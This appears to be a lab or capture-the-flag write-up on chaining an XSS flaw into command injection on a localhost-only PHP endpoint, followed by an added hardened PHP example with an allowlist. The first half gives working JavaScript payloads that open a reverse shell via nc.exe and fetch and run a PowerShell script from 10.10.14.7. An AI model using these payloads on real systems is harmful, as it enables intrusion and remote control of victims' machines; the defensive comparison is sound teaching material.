I would like to share how to build on an attack once you have found one or two vulnerabilities, chaining them into a further step so that the attack's impact is maximized.
The XSS payload has two stages: the code injected in the first stage is small and only loads the second stage, the bigger payload.
Let's look at the first-stage XSS code.
Method 1: Command Injection
    // Stage one: a single XHR that drives the localhost-only endpoint from the victim's browser.
    var xhttp = new XMLHttpRequest();
    xhttp.open("POST", "backdoorchecker.php", true);
    // Form encoding so that PHP populates $_POST['cmd'] (as in the second method below).
    xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // Backslashes are doubled for the JS string literal: the server sees \\10.10.14.7\smb\nc.exe.
    xhttp.send("cmd=diras || \\\\10.10.14.7\\smb\\nc.exe -e cmd.exe 10.10.14.7 9090");
I use the Python SimpleHTTPServer module to create a simple HTTP server that hosts the second stage:
python -m SimpleHTTPServer 80
The second method uses Nishang PowerShell to establish the reverse shell. We can modify the java.js script as below:
    var xhttp = new XMLHttpRequest();
    var url = '/admin/backdoorchecker.php';
    // The injected pipe makes the endpoint fetch and run rev.ps1 from the stage-two server.
    var param = 'cmd=dir| powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.7/rev.ps1\')"';
    xhttp.open("POST", url, true);
    // setRequestHeader (not requestHeader) is the XMLHttpRequest method; without the
    // form content type PHP would not populate $_POST['cmd'].
    xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhttp.send(param);
Below is the backdoorchecker.php page for your reference. It has a command injection vulnerability, but it can only be invoked from localhost.
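The page does not reproduce the source of backdoorchecker.php, so the following is an added example written for this page rather than the original file. It assumes the shape the text describes (a POST parameter named "cmd" handed to the shell, gated only on REMOTE_ADDR) and puts a hardened version next to it. The allowlisted command strings, the "INJECTED" marker and the simulated request arrays are constructed for the example. The point for a defender: the localhost check is not an authentication control, because the request in the sections above is sent by the victim's own browser on that host, and a CSRF token would not help either since same-origin XSS can read it. The fix that holds is to stop user-controlled bytes from ever reaching a shell.

```php
<?php
// Added example, not the page's backdoorchecker.php. The "vulnerable" shape is
// assumed from the page's description; everything else is constructed here.

// Vulnerable shape: REMOTE_ADDR is the only control, and the raw string
// reaches the shell, so "|" and "||" chain arbitrary commands. A script
// running in an admin's browser on that host satisfies the check for free.
function vulnerable_backdoorchecker(array $server, array $post): string
{
    if (($server['REMOTE_ADDR'] ?? '') !== '127.0.0.1') {
        return 'only localhost may call this page';
    }
    return (string) shell_exec($post['cmd'] ?? '');
}

// Hardened shape: the request may only *select* a fixed command, so no
// attacker-controlled bytes reach the shell, whoever sends the request.
// The command strings are constructed placeholders for the example.
const ALLOWED_COMMANDS = [
    'dir'    => 'dir',
    'whoami' => 'whoami',
];

function hardened_backdoorchecker(array $server, array $post): string
{
    // Keep the localhost check as defense in depth, but do not treat it as
    // authentication: a victim's browser on that host passes it too.
    if (($server['REMOTE_ADDR'] ?? '') !== '127.0.0.1') {
        http_response_code(403);
        return 'only localhost may call this page';
    }
    $name = $post['cmd'] ?? '';
    // Exact-match lookup on the allowlist key: "dir| powershell ..." or
    // "dir || \\host\share\nc.exe ..." is not a key, so it is rejected
    // before anything resembling a shell is involved.
    if (!is_string($name) || !array_key_exists($name, ALLOWED_COMMANDS)) {
        http_response_code(400);
        return 'unknown command';
    }
    return (string) shell_exec(ALLOWED_COMMANDS[$name]);
}

if (PHP_SAPI !== 'cli') {
    // Served by a web server: answer the real request with the hardened handler.
    header('Content-Type: text/plain');
    echo hardened_backdoorchecker($_SERVER, $_POST);
} else {
    // Run from the command line: simulate a request from the victim's browser
    // carrying a chained command (a harmless stand-in for the page's payloads).
    $fromLocalhost = ['REMOTE_ADDR' => '127.0.0.1'];
    $injected      = ['cmd' => 'dir| echo INJECTED'];

    echo "vulnerable: ", trim(vulnerable_backdoorchecker($fromLocalhost, $injected)), "\n";
    // -> the INJECTED marker appears: the second command ran.
    echo "hardened:   ", hardened_backdoorchecker($fromLocalhost, $injected), "\n";
    // -> "unknown command": the chained string never reaches the shell.
    echo "hardened:   ", trim(hardened_backdoorchecker($fromLocalhost, ['cmd' => 'whoami'])), "\n";
    // -> the current user: an allowlisted selector still works.
}
```

Run it with `php backdoorchecker_example.php` to see the two handlers side by side on the same injected input; the web branch is what you would actually deploy. Output encoding of whatever the admin page renders (and a Content-Security-Policy) is the separate fix for the XSS entry point itself; the allowlist above is what makes the endpoint safe even when that fix is missing.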